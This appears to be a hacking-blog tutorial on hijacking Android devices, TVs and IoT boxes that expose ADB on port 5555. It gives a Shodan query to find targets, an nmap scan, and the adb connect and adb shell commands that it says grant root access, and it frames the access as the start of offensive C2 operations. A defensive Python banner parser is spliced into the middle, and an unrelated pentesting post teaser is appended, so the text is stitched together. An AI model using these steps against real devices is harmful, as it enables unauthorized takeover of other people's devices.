Android Hacking: How Hackers Use Android Debug Bridge (ADB) to Take Over Devices

15 December 2025 at 10:46

Welcome back, aspiring cyberwarriors!

According to StatCounter, in 2025 Android powers over 3.3 billion users worldwide, dominating the global mobile OS market with a 71.85% share. But beyond phones, Android also powers a wide range of devices, including tablets, TVs, automotive systems, XR devices, and more.

Today, I’d like to show you how all of these devices can be hacked in seconds due to the negligence of their owners.

Android Debug Bridge (ADB)

Android Debug Bridge (ADB) is a versatile command-line tool that allows you to communicate with an Android device or emulator. The ADB command enables various device actions, such as installing and debugging apps. It also provides access to a Unix shell, letting you run a wide range of commands directly on the device.

ADB is a client-server program composed of three main components:

  • Client: Runs on your development machine and sends commands. You invoke the client by issuing ADB commands from a terminal.
  • Server: Also runs on your development machine as a background process. It manages communication between the client and the device daemon, handling multiple device connections.
  • Daemon (adbd): Runs as a background process on each connected Android device or emulator. It executes commands sent from the server.

ADB can be accessed via both USB and Wi-Fi. When ADB is enabled over Wi-Fi (also known as ADB over TCP/IP), it listens on port 5555 and can accept connections from any device that can reach it: not just those on the same Wi-Fi network, but potentially from other networks via the internet if the device’s port is exposed, effectively opening a door for hackers.

Recon

To find systems with exposed ADB, we can use the well-known service Shodan, for example, by using the search query: “Android Debug Bridge port:5555”.

You can use nmap to check if there’s an ADB server on a target host like this:

kali> nmap <IP> -p 5555 -sV

If the service is running and allows unauthorized access, you might be able to see some valuable information, such as the system name, model, and available features.
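For defenders auditing captures from their own network, the sketch below parses adbd's first reply on port 5555 and tells apart a daemon that demands key authorization (AUTH) from one that answers CNXN without it, pulling the model and features out of the banner. It is an added example, not code from the original article; the function names and the sample messages (including the `EXAMPLE-TV` model) are constructed for illustration.

```python
import struct

# ADB transport header: command, arg0, arg1, data_length, data_check, magic
HEADER = struct.Struct("<6I")
A_CNXN = 0x4E584E43  # b"CNXN" read as a little-endian u32
A_AUTH = 0x48545541  # b"AUTH"


def parse_message(raw: bytes):
    """Parse one ADB message and return (command, arg0, payload)."""
    if len(raw) < HEADER.size:
        raise ValueError("short ADB header")
    cmd, arg0, _arg1, length, _check, magic = HEADER.unpack_from(raw)
    if cmd ^ 0xFFFFFFFF != magic:
        raise ValueError("magic mismatch: not an ADB message")
    payload = raw[HEADER.size:HEADER.size + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    return cmd, arg0, payload


def classify_first_reply(raw: bytes) -> dict:
    """Classify adbd's first reply to a host CNXN that carried no credentials."""
    cmd, _arg0, payload = parse_message(raw)
    if cmd == A_AUTH:
        return {"unauthenticated": False, "note": "adbd demands key authorization"}
    if cmd != A_CNXN:
        return {"unauthenticated": False, "note": "unexpected first reply"}
    # Banner layout: <systemtype>:<serial>:<prop=value;...>
    banner = payload.rstrip(b"\x00").decode("utf-8", "replace")
    systype, _serial, props = (banner.split(":", 2) + ["", ""])[:3]
    kv = dict(p.split("=", 1) for p in props.split(";") if "=" in p)
    return {"unauthenticated": True, "systemtype": systype,
            "model": kv.get("ro.product.model"),
            "features": [f for f in kv.get("features", "").split(",") if f]}


def sample(cmd: int, arg0: int, payload: bytes) -> bytes:
    """Build a constructed sample message (not captured traffic)."""
    return HEADER.pack(cmd, arg0, 0x1000, len(payload),
                       sum(payload) & 0xFFFFFFFF, cmd ^ 0xFFFFFFFF) + payload


# Constructed samples: an open TV box and a device that enforces authorization.
OPEN_REPLY = sample(A_CNXN, 0x01000000,
    b"device::ro.product.name=examplebox;ro.product.model=EXAMPLE-TV;"
    b"ro.product.device=examplebox;features=cmd,shell_v2")
AUTH_REPLY = sample(A_AUTH, 1, bytes(range(20)))  # arg0=1: TOKEN, 20-byte nonce

if __name__ == "__main__":
    for name, raw in (("open", OPEN_REPLY), ("auth", AUTH_REPLY)):
        print(name, classify_first_reply(raw))
```

A device that returns the CNXN banner here should have network debugging switched off or port 5555 blocked at the network edge.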

Attack Via ADB Shell

First of all, we need to install the ADB client. We can do so with the command:

kali> sudo apt install adb

You can check if the installation succeeded by viewing the help screen:

kali> adb --help

After that, we can try to connect:

kali> adb connect <ip>:<port>

We can check the connected devices with the command:

kali> adb devices

And move directly to the shell:

kali> adb shell

And we’re immediately granted root access to the system. We can do anything we want.

Post-Exploitation

Once ADB shell access is obtained, a single session can be useful but remains limited. Real offensive operations demand persistent access, remote control, and covert data channels. This is where Command and Control (C2) becomes essential. I won’t cover it here, as it’s a broad topic, but you can learn more in our Infrastructure Basics for Hackers course.

Conclusion

ADB is not inherently insecure, but when misconfigured, it becomes one of the fastest ways to compromise an Android-based system. The attacker does not need a CVE or an exploit chain. All they need is port 5555 and silence on the defender’s side.

Thousands of devices remain exposed today, mostly smart TVs, Android TV boxes, routers, IoT appliances, and older smartphones. These devices are often unpatched, unmanaged, and forgotten.

Find out if your phone has been hacked and how to investigate it by attending our Mobile Forensics class.

Start to Finish: Configuring an Android Phone for Pentesting

By: BHIS
25 January 2023 at 10:26

Jeff Barbi // *Guest Post Background Unless you’re pentesting mobile apps consistently, it’s easy for your methodologies to fall out of date. Each new version of Android brings with it […]

The post Start to Finish: Configuring an Android Phone for Pentesting appeared first on Black Hills Information Security.
